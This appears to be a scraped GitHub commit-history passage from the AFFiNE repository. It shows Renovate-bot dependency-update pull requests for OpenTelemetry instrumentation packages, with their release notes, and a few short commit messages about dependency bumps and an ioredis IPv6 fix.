[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/c84212cca7f010b80747cccb9942474e0459df6e...7a5f3c0a09b6a2d32c712b2962b95137c906a016) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3353](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3353)) ([a56bbdc](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/a56bbdc34a5015b0a5fdcb7522f168cfc90ba95c)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.57.0 to ^0.58.0 ### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0580-2026-01-14) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/66935ac724cc271f70028035e534d47a4dfbcf12...c84212cca7f010b80747cccb9942474e0459df6e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3332](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3332)) ([925a150](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/925a1501ce0d082c6845d36e7c964e625ee3de0c)) - **deps:** update deps matching '@​opentelemetry/\*' ([#​3340](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3340)) ([2954943](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/29549434e7204b03d58635eb20352efee0e797d4)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.56.0 to ^0.57.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.57.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0570-2026-01-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/c84212cca7f010b80747cccb9942474e0459df6e...7a5f3c0a09b6a2d32c712b2962b95137c906a016) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3353](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3353)) ([a56bbdc](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/a56bbdc34a5015b0a5fdcb7522f168cfc90ba95c)) ### [`v0.56.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0560-2026-01-14) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/94e5b7da4500459e38e8d4dfda93542f22159600...c84212cca7f010b80747cccb9942474e0459df6e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3332](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3332)) ([925a150](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/925a1501ce0d082c6845d36e7c964e625ee3de0c)) - **deps:** update deps matching '@​opentelemetry/\*' ([#​3340](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3340)) ([2954943](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/29549434e7204b03d58635eb20352efee0e797d4)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.57.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0570-2026-01-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/c84212cca7f010b80747cccb9942474e0459df6e...7a5f3c0a09b6a2d32c712b2962b95137c906a016) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3353](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3353)) ([a56bbdc](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/a56bbdc34a5015b0a5fdcb7522f168cfc90ba95c)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.57.0 to ^0.58.0 ### [`v0.56.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0560-2026-01-14) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/66935ac724cc271f70028035e534d47a4dfbcf12...c84212cca7f010b80747cccb9942474e0459df6e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3332](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3332)) ([925a150](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/925a1501ce0d082c6845d36e7c964e625ee3de0c)) - **deps:** update deps matching '@​opentelemetry/\*' ([#​3340](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3340)) ([2954943](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/29549434e7204b03d58635eb20352efee0e797d4)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.56.0 to ^0.57.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
27a58e764c | chore: bump version & deps | ||
|
|
e4dc82ee35 |
chore: bump deps (#14227)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated backend service dependencies to the latest stable versions for
improved performance and security.
* Upgraded UI component library dependencies to the latest minor
releases.
* **Improvements**
* Enhanced web search functionality for better search results on
standard AI models.
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
|
aa6f26b1a5 |
chore: bump up opentelemetry (#14208)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.56.0` → `^0.57.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.56.0/0.57.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`0.55.0` → `0.55.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.55.0/0.55.1) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.57.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0570-2025-12-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/94e5b7da4500459e38e8d4dfda93542f22159600...66935ac724cc271f70028035e534d47a4dfbcf12) ##### Features - **instrumentations-ioredis:** support `net.*` and database semconv migration ([#​3266](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3266)) ([9f92c8b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/9f92c8b5b1660ff83ae27a733d13ac9f71695484)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.55.0 to ^0.56.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.55.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0551-2025-12-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/94e5b7da4500459e38e8d4dfda93542f22159600...66935ac724cc271f70028035e534d47a4dfbcf12) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.55.0 to ^0.56.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42OS4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjkuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
510933becf |
chore(server): bump ioredis to 5.8.2 for ipv6 support (#14204)
Bump ioredis to 5.8.2 for ipv6 support. Prior to 5.8.2 ioredis required passing `family: 0` or `family: 6` when constructing a client in order to connect to redis over ipv6. This was fixed in 5.8.2. fix #14197 |
||
|
|
0b0ae5ea0a | feat: add queue management for admin panel | ||
|
|
4eed92cebf | feat: improve electron sandbox (#14156) |